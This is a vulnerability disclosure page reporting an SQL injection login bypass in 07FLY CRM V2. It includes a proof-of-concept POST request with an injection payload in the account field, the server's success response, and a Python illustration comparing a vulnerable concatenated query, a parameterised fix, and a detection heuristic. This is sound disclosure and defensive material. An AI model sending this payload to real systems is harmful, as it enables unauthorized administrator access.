Submission #205839 information: An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login page

Title: An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login page
Description: 07FLY CRM V2 was found vulnerable to authentication bypass via SQL injection when logging in on the administrator login page. The attack can be initiated remotely. 07FLY CRM official website: https://gitee.com/07fly/FLY-CRM

# An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login

# Description

07FLY CRM was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page. The attack can be initiated remotely.

# Vulnerability Type

SQL Injection

# Vendor of Product

07FLY CRM v2

# Affected Product Code Base

https://gitee.com/07fly/FLY-CRM

# Attack Type

Remote

# Proof of Concept

```
Request:
POST /index.php/sysmanage/Login/login_auth/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://www.fly.net/
Content-Length: 79
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: www.fly.net
Connection: Keep-alive

account=-1'%20OR%203*2*1=6%20AND%20000189=000189%20or%20'QMZIxlBw'='&password=1
```

```
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sat, 09 Sep 2023 12:14:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Set-Cookie: PHPSESSID=nj2a14ltn5cfgsomfr4iq6ss83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 126

{"statusCode":"200","message":"\/index.php\/sysmanage\/Index\/","navTabId":"","rel":"1","callbackType":"","forwardUrl":""}
```
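The submission shows only the request and response, not the login code, so the following is an added illustration written for this page (not code from the advisory or from 07FLY CRM): it assumes the flawed check splices the posted `account` value into the SQL text, models that in Python with sqlite3, and places the parameterised form beside it; the `sys_admin` table, the `hash_pw` helper and the sample admin row are constructed placeholders.

```python
import hashlib
import sqlite3

# URL-decoded `account` value from the PoC request above.
POC_ACCOUNT = "-1' OR 3*2*1=6 AND 000189=000189 or 'QMZIxlBw'='"


def hash_pw(password: str) -> str:
    # Placeholder for whatever hashing the real application applies;
    # the hash is not what decides the bypass, the query shape is.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed sample table with one administrator row (assumed schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_admin (id INTEGER, account TEXT, password TEXT)")
    conn.execute("INSERT INTO sys_admin VALUES (1, 'admin', ?)", (hash_pw("s3cret-demo"),))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, account: str, password: str) -> bool:
    # Assumed flawed shape: request fields concatenated into the SQL string.
    # The PoC value closes the account literal and appends an always-true OR
    # term; since AND binds tighter than OR, the password comparison no longer
    # constrains the result and the first admin row comes back.
    sql = (f"SELECT id FROM sys_admin WHERE account='{account}' "
           f"AND password='{hash_pw(password)}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, account: str, password: str) -> bool:
    # Parameterised query: the same PoC string is bound as a plain value,
    # compared literally against the account column, and matches nothing.
    row = conn.execute(
        "SELECT id FROM sys_admin WHERE account=? AND password=?",
        (account, hash_pw(password)),
    ).fetchone()
    return row is not None


def looks_like_login_injection(account: str) -> bool:
    # Cheap alerting hint for application logs: a quote in the account field
    # combined with a boolean operator, as in the PoC payload. A signal to
    # alert on, not a substitute for the query fix above.
    lowered = account.lower()
    return "'" in lowered and (" or " in lowered or " and " in lowered)
```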
Source: ⚠️ https://github.com/chosir/exp/tree/main
User: alice2014 (UID 54262)
Submitted: 2023-09-09 15:29 (3 years ago)
Moderated: 2023-09-16 09:15 (7 days later)
Status: Accepted
VulDB Entry: 239861 [07FLY CRM V2 Administrator Login Page login_auth account SQL injection]
Points: 20
